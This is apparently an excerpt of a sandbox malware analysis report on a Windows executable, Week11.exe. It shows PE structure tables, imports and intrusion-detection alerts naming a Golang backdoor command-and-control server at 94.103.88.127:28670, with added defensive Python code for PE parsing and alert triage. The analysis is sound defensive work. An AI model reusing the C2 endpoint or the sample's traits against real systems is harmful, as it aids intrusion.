                              push eax
                              push dword ptr [ebp-04h]
                              push dword ptr [ebp+14h]
                              push dword ptr [ebp+10h]
                              push dword ptr [ebp+0Ch]
                              push dword ptr [ebp+08h]
                              call 00007F085CB807BDh
                              add esp, 20h
                              mov dword ptr [ebp-08h], eax
                              pop edi
                              pop esi
                              pop ebx
                              mov eax, dword ptr [ebp+00h]
                              Programming Language:
                              • [C++] VS2008 build 21022
                              • [C++] VS2005 build 50727
                              • [ C ] VS2005 build 50727
                              • [IMP] VS2005 build 50727
                              • [ASM] VS2008 SP1 build 30729
                              • [ C ] VS2008 SP1 build 30729
                              • [C++] VS2008 SP1 build 30729
                              • [RES] VS2008 build 21022
                              • [LNK] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd771c | 0x190 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe9000 | 0x790d5c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x123898 | 0x37a8 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11b000 | 0x9dd0 | .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb8c10 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xc6720 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb8000 | 0x8ac | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb7000 | 0xb6c00 | 209499c11726f362ccd66f1fbadf0dd2 | False | 0.5103921746751026 | data | 6.788533709823602 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xb8000 | 0x23000 | 0x22800 | eb91e1596f235b3413d6fa622b45c87a | False | 0.32765794836956524 | data | 4.672379036995675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xdb000 | 0xe000 | 0x6000 | d2bdce02712eb535a94a1cb6ac8c2cc2 | False | 0.2332763671875 | OpenPGP Public Key | 4.3556072570206315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xe9000 | 0x790d5c | 0x790e00 | 067ffc953e40fa64a98d03031022ba0a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
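The data-directory and section tables above are the output of a PE header parse: each directory address is resolved to the section whose virtual-address range contains it, and each section's raw bytes are measured for 8-bit entropy. Two things the numbers imply are worth checking by hand. First, if the headers occupy the usual 0x400 bytes, the four raw sizes (0xb6c00 + 0x22800 + 0x6000 + 0x790e00) plus the headers come to exactly 0x870600, which is the 8'848'896-byte file size; that leaves no overlay, so the SECURITY directory at 0x123898 points inside .rsrc's raw data rather than at a certificate table appended after the last section, which is where signtool puts one. Second, SECURITY is the one directory whose address is a raw file offset rather than an RVA, so it has to be resolved by file offset; here either method lands in .rsrc, but in general an RVA lookup of that entry is meaningless. The Python below is an added example written for this page (not Joe Sandbox's code, and not code from the sample): it parses PE32 headers, resolves the directories the right way, computes per-section entropy, decodes the TimeDateStamp, and recomputes the optional-header CheckSum against the stored value. To run offline it builds a small synthetic PE32 in memory; its section names, addresses and stand-in certificate blob are constructed and are not taken from Week11.exe, only the timestamp 0x5F92B0F1 is.

```python
import math
import struct
from datetime import datetime, timezone

DIRECTORY_NAMES = ("EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC", "DEBUG",
                   "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT", "IAT",
                   "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED")   # table order of the 16 directories

def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte (0.0 to 8.0), the report's 'Entropy (8bit)'."""
    n, counts = len(data) or 1, [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def pe_checksum(data, checksum_offset):
    """Image checksum as CheckSumMappedFile computes it: fold the file's dwords into a 16-bit
    one's-complement sum, skipping the CheckSum field itself, then add the file length."""
    padded, total = data + b"\0" * (-len(data) % 4), 0
    for off in range(0, len(padded), 4):
        if off != checksum_offset:
            total += struct.unpack_from("<I", padded, off)[0]
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)

def parse_pe(data):
    """Read the PE32 header fields behind the section and data-directory tables."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                                   # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    ndirs = min(struct.unpack_from("<I", data, opt + 92)[0], 16)
    directories = [(DIRECTORY_NAMES[i],) + struct.unpack_from("<II", data, opt + 96 + 8 * i)
                   for i in range(ndirs)]
    sections = []
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "va": va, "vsize": vsize,
                         "raw_size": raw_size, "raw_ptr": raw_ptr, "characteristics": flags,
                         "entropy": shannon_entropy(data[raw_ptr:raw_ptr + raw_size])})
    stored = struct.unpack_from("<I", data, opt + 64)[0]
    return {"entry_point": struct.unpack_from("<I", data, opt + 16)[0],
            "image_base": struct.unpack_from("<I", data, opt + 28)[0],
            "compile_time": datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
            "checksum_valid": stored != 0 and stored == pe_checksum(data, opt + 64),
            "directories": directories, "sections": sections}

def section_for_rva(sections, rva):
    """Section whose mapped range contains rva, or None when it falls outside every section."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s["name"]
    return None

def section_for_offset(sections, offset):
    """Same lookup by raw file offset; 'overlay' means data past every section's raw bytes."""
    for s in sections:
        if s["raw_ptr"] <= offset < s["raw_ptr"] + s["raw_size"]:
            return s["name"]
    return "overlay"

def locate_directories(pe):
    """Map each non-empty directory to its section, as in the 'Is in Section' column. SECURITY (the
    Authenticode certificate table) stores a raw file offset, not an RVA, so it is resolved by offset."""
    return {name: (section_for_offset if name == "SECURITY" else section_for_rva)(pe["sections"], addr)
            for name, addr, size in pe["directories"] if size}

def build_sample_pe():
    """Constructed two-section PE32 (not a runnable program) so the parser runs offline: .text holds every
    byte value twice (entropy 8.0), .rsrc is zeros, and a 16-byte stand-in certificate blob is the overlay."""
    text, rsrc, cert = bytes(range(256)) * 2, b"\0" * 0x200, b"C" * 0x10
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0x5F92B0F1, 0, 0, 0xE0, 0x0102)   # i386, 2 sections, EXE
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                                # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                              # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)           # ImageBase, section/file alignment
    struct.pack_into("<II", opt, 56, 0x3000, 0x400)                      # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 68, 2)                                   # Subsystem: Windows GUI
    struct.pack_into("<I", opt, 92, 16)                                  # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * 1, 0x1080, 0x28)               # IMPORT: an RVA inside .text
    struct.pack_into("<II", opt, 96 + 8 * 4, 0x800, len(cert))           # SECURITY: a FILE OFFSET
    section = lambda n, vs, va, rs, rp, f: struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, f)
    headers = (dos + b"PE\0\0" + coff + bytes(opt)
               + section(b".text", 0x200, 0x1000, 0x200, 0x400, 0x60000020)
               + section(b".rsrc", 0x100, 0x2000, 0x200, 0x600, 0x40000040))
    image = bytearray(headers.ljust(0x400, b"\0") + text + rsrc + cert)
    checksum_off = e_lfanew + 24 + 64                                    # CheckSum field (dword-aligned)
    struct.pack_into("<I", image, checksum_off, pe_checksum(bytes(image), checksum_off))
    return bytes(image)
```

Pointing `parse_pe` at the bytes of a real sample gives the same rows as the tables above (section entropy, directory-to-section mapping) plus the two header checks the tables do not show: `compile_time`, which for 0x5F92B0F1 decodes to 2020-10-23 10:31:13 UTC as in the header listing, and `checksum_valid`, which is False both for a zero CheckSum and for one that no longer matches the bytes. A mismatch is expected for an unsigned or hand-edited binary; combined with a SECURITY entry that lands inside a section rather than in the overlay, it is the kind of pairing that justifies verifying the Authenticode signature rather than trusting the "Digitally signed: true" flag.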
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
UIDATA | 0xe93c4 | 0x29e4a | Zip archive data, at least v1.0 to extract, compression method=store | English | United States | 0.14798885741925707
UIDATA | 0x113210 | 0x1774 | XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators | English | United States | 0.14723517654896737
UIDATA | 0x114984 | 0x10be | Unicode text, UTF-16, little-endian text, with CRLF line terminators | English | United States | 0.1532897806812879
RT_ICON | 0x115a44 | 0xaae0 | PC bitmap, Windows 3.x format, 6329 x 2 x 41, image size 44655, cbSize 43744, bits offset 54 | | | 0.5107671909290417
RT_ICON | 0x120524 | 0x86ee | PC bitmap, Windows 3.x format, 4542 x 2 x 53, image size 34904, cbSize 34542, bits offset 54 | | | 0.422992299229923
RT_ICON | 0x128c14 | 0x3e9b | PC bitmap, Windows 3.x format, 2443 x 2 x 46, image size 16391, cbSize 16027, bits offset 54 | | | 0.4940413052973108
RT_ICON | 0x12cab0 | 0x1817d | PC bitmap, Windows 3.x format, 12386 x 2 x 41, image size 98844, cbSize 98685, bits offset 54 | | | 0.4911992704058368
RT_ICON | 0x144c30 | 0x730236 | PC bitmap, Windows 3.x format, 942397 x 2 x 51, image size 7537883, cbSize 7537206, bits offset 54 | | | 0.6396074295043945
RT_ICON | 0x874e68 | 0xffb | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8944023466145197
RT_ICON | 0x875e64 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.04948132780082987
RT_ICON | 0x87840c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.0825515947467167
RT_ICON | 0x8794b4 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.19858156028368795
RT_RCDATA | 0x87991c | 0x80 | data | English | United States | 1.0859375
RT_GROUP_ICON | 0x87999c | 0x3e | data | English | United States | 0.8064516129032258
RT_VERSION | 0x8799dc | 0x380 | data | English | United States | 0.43191964285714285
DLL: imported functions
KERNEL32.dll: ExitThread, CreateThread, ExitProcess, GetStartupInfoW, RtlUnwind, HeapReAlloc, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LCMapStringW, GetStdHandle, GetModuleFileNameA, GetTimeFormatA, GetDateFormatA, HeapCreate, HeapDestroy, VirtualFree, VirtualAlloc, GetConsoleCP, GetConsoleMode, LCMapStringA, SetHandleCount, GetFileType, GetStartupInfoA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetStringTypeA, GetStringTypeW, IsDebuggerPresent, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, GetProcessHeap, CreateFileA, SetEnvironmentVariableA, SetUnhandledExceptionFilter, HeapAlloc, TerminateProcess, GetFileSizeEx, LocalFileTimeToFileTime, GetLocaleInfoW, CompareStringA, GetShortPathNameW, SetEndOfFile, FlushFileBuffers, GlobalFlags, GlobalAddAtomW, GlobalFindAtomW, lstrcmpiA, GetTempFileNameW, OpenMutexW, ReleaseMutex, HeapWalk, HeapLock, OpenThread, HeapUnlock, OutputDebugStringW, SetFilePointerEx, IsProcessorFeaturePresent, GlobalDeleteAtom, LoadLibraryA, GetVersionExA, UnhandledExceptionFilter, HeapFree, lstrlenA, lstrcmpA, CompareStringW, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, GetFullPathNameW, GetLogicalDriveStringsW, DeviceIoControl, InterlockedExchange, MoveFileW, GetFileAttributesW, RemoveDirectoryW, FindClose, FindNextFileW, FindFirstFileW, QueryPerformanceCounter, SetFileAttributesW, lstrcmpW, GlobalAlloc, GlobalLock, GlobalUnlock, SetErrorMode, SetEnvironmentVariableW, GetCommandLineW, ExpandEnvironmentStringsW, lstrcmpiW, lstrlenW, SetFilePointer, InterlockedIncrement, ProcessIdToSessionId, FreeResource, GetSystemWindowsDirectoryW, LocalAlloc, SystemTimeToFileTime, GetModuleHandleA, GetTimeZoneInformation, LocalFree, GlobalFree, CreateMutexW, FreeConsole, GetCurrentProcessId, LoadLibraryExW, GetTempPathW, GetDriveTypeW, GetWindowsDirectoryW, GetUserDefaultUILanguage, SetCurrentDirectoryW, GetPrivateProfileStringW, GetPrivateProfileSectionW, GetPrivateProfileSectionNamesW, Sleep, InterlockedCompareExchange, GetVersionExW, GetModuleFileNameW, MultiByteToWideChar, WriteFile, ReadFile, GetFileSize, CreateFileW, CopyFileW, FreeLibrary, LoadLibraryW, GetModuleHandleW, GetProcAddress, InterlockedDecrement, MulDiv, GetCurrentProcess, SetEvent, CreateEventW, ResetEvent, GetTickCount, WaitForSingleObject, WideCharToMultiByte, GetSystemTimeAsFileTime, DeleteFileW, GetVersion, GetSystemDirectoryW, SetLastError, RaiseException, DeleteCriticalSection, InitializeCriticalSection, CreateProcessW, GetLastError, OpenProcess, FindResourceExW, FindResourceW, LoadResource, LockResource, SizeofResource, CloseHandle, LeaveCriticalSection, EnterCriticalSection, GetCurrentThreadId, FlushInstructionCache, GetUserDefaultLCID
USER32.dll: GetWindowTextW, GetWindowTextLengthW, RedrawWindow, DrawTextW, DispatchMessageW, TranslateMessage, GetMessageW, SetWindowTextW, GetWindow, MonitorFromWindow, MapWindowPoints, IsRectEmpty, IsDialogMessageW, GetClientRect, DrawIconEx, DestroyIcon, GetActiveWindow, MessageBoxW, InvalidateRect, MonitorFromRect, PostQuitMessage, UnhookWindowsHookEx, GetLastActivePopup, GetSubMenu, GetMenuItemCount, GetMenuItemID, GetMenuState, ValidateRect, CallNextHookEx, SetWindowsHookExW, GetSysColorBrush, CheckMenuItem, EnableMenuItem, ModifyMenuW, SetCursor, GetDlgCtrlID, GetKeyState, GetWindowDC, BeginPaint, LoadBitmapW, SetWindowLongW, GetWindowLongW, DefWindowProcW, CallWindowProcW, GetWindowThreadProcessId, FindWindowW, SendMessageTimeoutW, IsWindow, KillTimer, GetMenuCheckMarkDimensions, DestroyWindow, GetWindowPlacement, ShowWindow, SetTimer, IsWindowVisible, RegisterClassExW, GetClassInfoExW, SetMenu, GetMessageTime, GetTopWindow, RemovePropW, GetPropW, SetPropW, GetCapture, WinHelpW, DestroyMenu, TabbedTextOutW, DrawTextExW, GrayStringW, EndPaint, SetCapture, ReleaseCapture, GetClassLongW, SetClassLongW, BringWindowToTop, SwitchToThisWindow, GetSystemMetrics, CharNextW, PeekMessageW, DestroyAcceleratorTable, InvalidateRgn, FillRect, CreateAcceleratorTableW, GetSysColor, GetClassNameW, GetDlgItem, IsChild, LoadImageW, LoadIconW, GetDesktopWindow, LoadCursorW, CreateWindowExW, EnableWindow, GetParent, SendMessageW, SetWindowPos, LoadStringW, UnregisterClassA, SetFocus, IsWindowEnabled, SetRectEmpty, RegisterWindowMessageW, GetDC, ReleaseDC, GetFocus, CopyRect, OffsetRect, ClientToScreen, GetMessagePos, PtInRect, ScreenToClient, MoveWindow, GetWindowRect, GetMonitorInfoW, AllowSetForegroundWindow, GetForegroundWindow, AttachThreadInput, SetForegroundWindow, SetActiveWindow, SetMenuItemBitmaps, IsIconic, SystemParametersInfoA, GetMenu, AdjustWindowRectEx, RegisterClassW, PostMessageW, GetKeyboardState, keybd_event, GetClassInfoW
GDI32.dll: ScaleWindowExtEx, PtVisible, SetWindowExtEx, SetMapMode, RestoreDC, SaveDC, ExtTextOutW, GetClipBox, CreateBitmap, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, Escape, TextOutW, RectVisible, GetStockObject, BitBlt, SetViewportOrgEx, GetPixel, CreateCompatibleBitmap, CreateFontW, SetTextColor, SetBkColor, CreateSolidBrush, GetTextExtentPoint32W, GetTextMetricsW, GetObjectA, GetObjectW, SelectObject, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps
WINSPOOL.DRV: ClosePrinter, DocumentPropertiesW, OpenPrinterW
ADVAPI32.dll: RegOpenKeyExA, ConvertSidToStringSidW, RegQueryValueExA, RegDeleteValueW, RegEnumKeyExW, RegQueryInfoKeyW, RegDeleteKeyW, GetSidSubAuthority, GetTokenInformation, OpenProcessToken, RegCreateKeyExW, RegSetValueExW, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, RegEnumKeyExA
SHELL32.dll: SHOpenFolderAndSelectItems, SHGetMalloc, SHGetSpecialFolderLocation, DragAcceptFiles, DragFinish, DragQueryFileW, SHGetFileInfoW, ShellExecuteExW, ShellExecuteW, SHGetPathFromIDListW, SHGetSpecialFolderPathW, SHGetFolderPathW
ole32.dll: OleLockRunning, StringFromGUID2, OleUninitialize, OleInitialize, CoCreateInstance, CoTaskMemAlloc, CoTaskMemRealloc, CoTaskMemFree, CoInitialize, CoUninitialize, CoGetClassObject, CLSIDFromProgID, CLSIDFromString, CreateStreamOnHGlobal
OLEAUT32.dll: VariantChangeType, LoadTypeLib, LoadRegTypeLib, SysStringLen, OleCreateFontIndirect, VarUI4FromStr, SysAllocStringLen, VarBstrCmp, SafeArrayUnlock, SafeArrayLock, SafeArrayDestroy, SafeArrayCreate, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, SafeArrayCopy, SafeArrayGetVartype, DispCallFunc, VariantInit, VariantClear, SysAllocString, SysFreeString
SHLWAPI.dll: StrCmpIW, PathCompactPathW, PathStripPathW, PathFindFileNameW, PathIsDirectoryW, PathAddBackslashW, StrStrIW, PathRemoveFileSpecW, PathAppendW, PathCombineW, SHSetValueA, SHGetValueA, PathFileExistsW, ColorHLSToRGB, ColorRGBToHLS, SHGetValueW, wnsprintfW
COMCTL32.dll: InitCommonControlsEx
gdiplus.dll: GdipDeletePrivateFontCollection, GdipNewPrivateFontCollection, GdipDrawImageRectRectI, GdipDrawLine, GdipAddPathEllipseI, GdipGetPathGradientPointCount, GdipSetPathGradientSurroundColorsWithCount, GdipSetPathGradientCenterColor, GdipCreatePathGradientFromPath, GdipCreateFromHWND, GdipGetFontHeight, GdipCreatePen2, GdipDrawRectangleI, GdipCreateLineBrushFromRect, GdipAddPathRectangleI, GdipPrivateAddMemoryFont, GdipSetPenWidth, GdipDrawEllipseI, GdipSetPenDashOffset, GdipAddPathLineI, GdipSetPixelOffsetMode, GdipDrawImageRectI, GdipGetImageGraphicsContext, GdipGetImagePixelFormat, GdipDrawImagePointRectI, GdipResetWorldTransform, GdipCreateBitmapFromScan0, GdipDrawPath, GdipFillPath, GdipSetSmoothingMode, GdipGetSmoothingMode, GdipResetClip, GdipCreatePath, GdipFillRectangleI, GdipRotateWorldTransform, GdipGetPixelOffsetMode, GdipTranslateWorldTransform, GdipSetClipRectI, GdipSetTextRenderingHint, GdipCreateFont, GdipGetFontCollectionFamilyList, GdipCreateLineBrushFromRectI, GdipClosePathFigure, GdipAddPathArcI, GdipResetPath, GdipDrawString, GdipMeasureString, GdipSetStringFormatAlign, GdipSetStringFormatLineAlign, GdipDeleteStringFormat, GdipCreateStringFormat, GdipDeleteFont, GdipCreateFontFromLogfontA, GdipCreateFontFromDC, GdipDrawRectangle, GdipDrawLineI, GdipSetPenDashStyle, GdipDeletePen, GdipCreatePen1, GdipBitmapSetPixel, GdipBitmapGetPixel, GdipGetImageHeight, GdipGetImageWidth, GdipCreateBitmapFromFile, GdipCloneImage, GdipDisposeImage, GdipFillRectangle, GdipCloneBrush, GdipAlloc, GdipFree, GdipDeleteBrush, GdipCreateSolidFill, GdipDeleteGraphics, GdipCreateFromHDC, GdipCreateBitmapFromStream, GdipSetPathGradientGammaCorrection, GdipSetPathGradientCenterPoint, GdipAddPathLine2, GdipGetPathWorldBoundsI, GdipAddPathPie, GdipAddPathLine, GdipAddPathArc, GdipSaveImageToFile, GdipGetImageEncoders, GdipGetImageEncodersSize, GdipSetInterpolationMode, GdipCloneFontFamily, GdipDeleteFontFamily, GdipDeletePath, GdipSetLinePresetBlend
VERSION.dll: VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WININET.dll: InternetCloseHandle, HttpQueryInfoW, InternetSetOptionW, InternetReadFile, InternetOpenUrlW, DeleteUrlCacheEntryW, InternetOpenW
PSAPI.DLL: GetModuleFileNameExW
IMM32.dll: ImmDisableIME
RPCRT4.dll: NdrAsyncClientCall, RpcAsyncInitializeHandle, RpcStringBindingComposeW, RpcBindingFromStringBindingW, RpcAsyncCompleteCall, RpcStringFreeW, RpcBindingFree
OLEACC.dll: LresultFromObject, CreateStdAccessibleObject
WTSAPI32.dll: WTSQuerySessionInformationW
USERENV.dll: GetUserProfileDirectoryW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-11T17:57:20.153843+0100 | 2855539 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 | 1 | 94.103.88.127 | 28670 | 192.168.2.5 | 49709 | TCP
2024-11-11T17:57:20.154104+0100 | 2855536 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 | 1 | 192.168.2.5 | 49709 | 94.103.88.127 | 28670 | TCP
2024-11-11T17:57:30.483613+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.5 | 49716 | TCP
2024-11-11T17:57:49.549151+0100 | 2855537 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 | 1 | 192.168.2.5 | 49709 | 94.103.88.127 | 28670 | TCP
2024-11-11T17:57:49.784386+0100 | 2855538 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 | 1 | 94.103.88.127 | 28670 | 192.168.2.5 | 49709 | TCP
2024-11-11T17:57:58.288467+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.5 | 57077 | TCP
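Read together, the alerts above fall into two findings of very different weight. The four ETPRO hits are bidirectional on one connection, 192.168.2.5:49709 to 94.103.88.127:28670: client-request signatures fire outbound and server-response signatures fire inbound for the same Golang backdoor protocol, on a port that is neither HTTP nor TLS. That pairing, not any single rule, is what makes 94.103.88.127:28670 a C2 indicator. The two ET EXPLOIT hits are not comparable evidence: a byte-pattern rule for a CAB parsing bug firing on inbound TCP/443 is matching what is almost certainly TLS ciphertext, so they belong in a low-confidence bucket rather than being read as a second compromise. The Python below is an added example (not part of the report and not Joe Sandbox's code) that applies that triage to Suricata fast.log records. Its input is a constructed fast.log mirroring the six alerts in the table (same SIDs, endpoints and timestamps; the rule revision numbers in the [gid:sid:rev] fields are placeholders, and the internal/external split assumes RFC 1918 addressing for the analysis host). It returns the confirmed C2 peer and port, the SIDs that established it in each direction, and the encrypted-port hits it set aside.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime

# Constructed fast.log input mirroring the six alerts in the table above (same SIDs,
# endpoints and timestamps); the ":1"/":2" rule revisions are placeholders.
SAMPLE_FAST_LOG = """\
11/11/2024-17:57:20.153843  [**] [1:2855539:1] ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 94.103.88.127:28670 -> 192.168.2.5:49709
11/11/2024-17:57:20.154104  [**] [1:2855536:1] ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.5:49709 -> 94.103.88.127:28670
11/11/2024-17:57:30.483613  [**] [1:2022930:2] ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.202.163.200:443 -> 192.168.2.5:49716
11/11/2024-17:57:49.549151  [**] [1:2855537:1] ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.5:49709 -> 94.103.88.127:28670
11/11/2024-17:57:49.784386  [**] [1:2855538:1] ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 94.103.88.127:28670 -> 192.168.2.5:49709
11/11/2024-17:57:58.288467  [**] [1:2022930:2] ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.202.163.200:443 -> 192.168.2.5:57077
"""

# One fast.log record: timestamp, [gid:sid:rev], message, classification, priority, proto, 5-tuple.
FAST_LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]"
    r".*?\[Priority:\s*(?P<prio>\d+)\]\s+\{(?P<proto>\w+)\}\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_fast_log(text):
    """Parse Suricata fast.log records into dicts; lines that are not alert records are skipped."""
    alerts = []
    for line in text.splitlines():
        m = FAST_LOG_RE.match(line.strip())
        if not m:
            continue
        a = m.groupdict()
        for key in ("gid", "sid", "rev", "prio", "sport", "dport"):
            a[key] = int(a[key])
        a["time"] = datetime.strptime(a["ts"], "%m/%d/%Y-%H:%M:%S.%f")
        alerts.append(a)
    return alerts


def remote_end(alert):
    """(peer_ip, peer_port, direction): the non-RFC1918 side of the packet, and whether the
    internal host sent it ('out') or received it ('in')."""
    if ipaddress.ip_address(alert["src"]).is_private:
        return alert["dst"], alert["dport"], "out"
    return alert["src"], alert["sport"], "in"


def triage_alerts(alerts, standard_ports=frozenset({80, 443, 8080, 8443})):
    """Group alerts per remote peer:port. A session is confirmed C2 only when a 'CnC Client
    Request' fired outbound AND a 'CnC Server Response' fired inbound on the same peer:port.
    Exploit content rules hitting inbound on TCP/443 are parked as low confidence, since the
    bytes they matched are almost certainly TLS ciphertext."""
    sessions = defaultdict(lambda: {"client": set(), "server": set(), "other": set(), "times": []})
    low_confidence = []
    for a in alerts:
        peer, port, direction = remote_end(a)
        if a["proto"] == "TCP" and port == 443 and direction == "in" and a["msg"].startswith("ET EXPLOIT"):
            low_confidence.append({"peer": peer, "port": port, "sid": a["sid"], "msg": a["msg"]})
            continue
        s = sessions[(peer, port)]
        s["times"].append(a["time"])
        if direction == "out" and "CnC Client Request" in a["msg"]:
            s["client"].add(a["sid"])
        elif direction == "in" and "CnC Server Response" in a["msg"]:
            s["server"].add(a["sid"])
        else:
            s["other"].add(a["sid"])
    report = []
    for (peer, port), s in sorted(sessions.items()):
        report.append({
            "peer": peer, "port": port,
            "confirmed_c2": bool(s["client"] and s["server"]),
            "nonstandard_port": port not in standard_ports,
            "client_sids": sorted(s["client"]), "server_sids": sorted(s["server"]),
            "other_sids": sorted(s["other"]),
            "first_seen": min(s["times"]).isoformat(), "last_seen": max(s["times"]).isoformat(),
        })
    return {"c2_sessions": report, "low_confidence": low_confidence}


if __name__ == "__main__":
    result = triage_alerts(parse_fast_log(SAMPLE_FAST_LOG))
    for s in result["c2_sessions"]:
        print(f"{s['peer']}:{s['port']} confirmed={s['confirmed_c2']} nonstandard_port={s['nonstandard_port']} "
              f"client_sids={s['client_sids']} server_sids={s['server_sids']} "
              f"({s['first_seen']} .. {s['last_seen']})")
    for lc in result["low_confidence"]:
        print(f"low confidence: sid {lc['sid']} from {lc['peer']}:{lc['port']} ({lc['msg']})")
```

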